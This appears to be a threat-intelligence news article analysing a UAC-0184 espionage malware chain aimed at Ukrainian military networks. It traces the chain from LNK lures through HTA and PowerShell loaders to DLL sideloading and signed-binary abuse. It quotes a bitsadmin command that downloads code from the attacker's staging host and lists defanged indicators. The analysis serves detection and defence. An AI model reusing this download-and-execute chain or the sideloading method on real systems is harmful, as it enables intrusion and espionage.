UAC-0184 uses a multi‑stage malware chain that abuses bitsadmin and HTA loaders to reach a heavily obfuscated payload bundle, ultimately hiding behind signed binaries such as VSLauncher.exe and PassMark Endpoint to gain stealthy network access on Ukrainian military networks.
CERT‑UA reporting through 2024–2025 highlights a focus on accounts belonging to the Armed Forces of Ukraine, with lures themed around military paperwork, combat footage, and personal contact.
Public analysis further notes the group’s preference for staged loaders, social‑engineering delivery and the use of commercially available tools alongside custom malware.
The sample discussed here fits that profile: it is tagged as Ukraine-related (“UKR”) in MalwareBazaar and uses Ukrainian/Russian names such as “Рапорт” (report) and “Таблиця” (table) for shortcut files, aligning with UAC‑0184 campaigns documented by CERT‑UA.
Synaptisc systems said in a report shared with GBhackers, UAC-0184 is a Russia-aligned cluster repeatedly linked to cyber‑espionage against the Ukrainian military and government, including campaigns via messengers and dating platforms.
While the tag alone does not prove targeting, the overlap with CERT‑UA’s infrastructure and tradecraft strongly supports the attribution.
UAC-0184 Uses Bitsadmin
The infection chain begins with a ZIP archive that contains three Windows shortcut (LNK) files masquerading as common office documents: a PDF scan, a Word report and an Excel table.
Each LNK points to cmd.exe in System32, but the real logic is in the command‑line arguments, which execute bitsadmin to download an HTA file and then invoke mshta.exe on a temporary copy.
The observed commands follow a consistent pattern: bitsadmin /transfer myjob /download /priority foreground hxxp://169.40.135[.]35/dctrpr/
All three shortcuts contact the same IP address 169.40.135[.]35 under the /dctrpr/ path, suggesting a shared staging host controlled by the operator.
Direct browser requests to these URLs can fail, indicating that the server likely applies gating (for example, geofencing or client filtering) which the attacker’s tooling is designed to emulate.
Behind the LNK layer sits an HTA file that serves as the next stage loader. The HTA contains JScript that creates a WScript.Shell ActiveX object and runs PowerShell with hidden window, no profile and ExecutionPolicy bypass to reduce visible artifacts and policy checks.
That PowerShell code writes a ZIP file named dctrprraclus.zip into %APPDATA%, extracts it into %APPDATA%ApplicationData32 and launches both Cluster-Overlay64.exe and a decoy PDF from that directory.
The download logic first checks whether the ZIP already exists locally and only calls Invoke‑WebRequest if needed, which helps with resilience and reduces network noise.
By pairing execution of the primary executable with opening a benign‑looking PDF, the actor improves the realism of the lure and hides the malicious behavior behind expected user outcomes.
Inside dctrprraclus.zip, the attacker packages a small ecosystem of files around Cluster-Overlay64.exe, a legitimate component of the Plane9 3D music visualizer.
The presence of Plane9Engine.dll, openvr_api.dll and additional .bin/.lib blobs in the same directory indicates a classic DLL sideloading scenario where a trusted executable loads a manipulated dependency that in turn resolves the actual payload.
Static analysis shows that openvr_api.dll references kernel-diag.lib and filter.bin via obfuscated RTTI-like strings embedded in .rdata, avoiding straightforward string usage in code.
The DLL walks the export table of kernel32 dynamically to resolve required APIs, then loads kernel-diag.lib from disk and decodes a data region via 32‑bit addition using an embedded key, revealing a further payload that behaves like an evr.dll‑style loader.
The next layer relies on filter.bin, which superficially looks like random data but internally holds a sequence of valid‑looking PNG chunks.
The decoded shellcode includes tell‑tale constants such as “x89PNG”, “IDAT” and “IEND”, and implements logic to iterate PNG chunks, concatenate IDAT data and apply a DWORD‑wise XOR with a constant key before passing the result into an LZNT1 decompression routine.
Frequency analysis over the concatenated IDAT stream reveals a dominant 32‑bit value which, when used as XOR key, produces data with clear PE signatures, confirming that the PNG‑like file is in fact a staged container for compressed executable content.
The shellcode then invokes an LZNT1 decompressor compatible with Windows RtlDecompressBuffer semantics, finally yielding a roughly 2 MB payload bundle where the first region is configuration data followed by multiple back‑to‑back PE files.
The unpacked bundle contains eight legitimate, digitally signed Windows binaries, including PassMark Endpoint (input.dll), Info‑ZIP’s unzip.exe and Microsoft’s SqlExpressChk.exe.
Configuration strings indicate that the chain ultimately drops input.dll next to VSLauncher.exe under %windir%SysWOW64 and then runs VSLauncher.exe to sideload the DLL in the context of a Microsoft‑signed process.
PassMark Endpoint exposes a network test service that listens on UDP multicast 224.0.0.255:31339 and uses a custom TCP protocol on port 31339, importing Winsock, IP helper APIs, performance counters and MiniDumpWriteDump.
By hijacking this environment, UAC‑0184 gains a signed, non‑suspicious network stack with multicast discovery and bidirectional TCP channels that can plausibly blend in as diagnostics traffic, while also inheriting process dump capabilities for data theft.
Command and control view
Across all stages, analysts have not observed a hardcoded external C2 domain or IP beyond the initial 169.40.135[.]35 staging host.
Strings in the decoded shellcode reference HTTP verbs and format-like tokens such as “%y…EF{DATA=”, suggesting that actual controller addresses are supplied at runtime, for example via multicast discovery, operator‑provided parameters or separate local artifacts.
From an infrastructure‑intelligence perspective, this chain combines gated HTA and ZIP staging, local composition via sideloaded multimedia components, pseudo‑PNG file‑format abuse for payload staging, and reuse of a signed third‑party network utility as the final communications surface.
That pattern aligns with broader UAC‑0184 operations but also shows a shift towards deeper obfuscation and stronger reliance on benign signed software to frustrate static detection.
IOCs
Network
hxxp://169.40.135.35/dctrpr/slippersuppity.hta
hxxp://169.40.135.35/dctrpr/basketpast.hta
hxxp://169.40.135.35/dctrpr/agentdiesel.hta
hxxp://169.40.135.35/dctrprraclus.zip
224.0.0.255:31339 UDP PassMark multicast, repurposed
31339/tcp BurnInTest data channel, repurposedSHA-256
kernel-diag.lib
dc6cddc391b373b18f105f49a80ff83d53b430d8dea35c1f1576832fa9fbd2b3
filter.bin
f5ca9c53d1537142889d7172c6643e886b2164233b91f0fc2d41ca010f035372
openvr_api.dll
df6942dc1a89226359adf1aac597c3b270f4a408214b4f7c2083f9524605e0f7
input.dll
b811f28b844eff8c1f4f931639bed5bcc41113364fdfc44d7703259457839edb
PE_08 SqlExpChk
33e44dea247eaa8b0fc8ed1f8ed575905f6ce0b7119337ddd29863bbb03288b3Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.
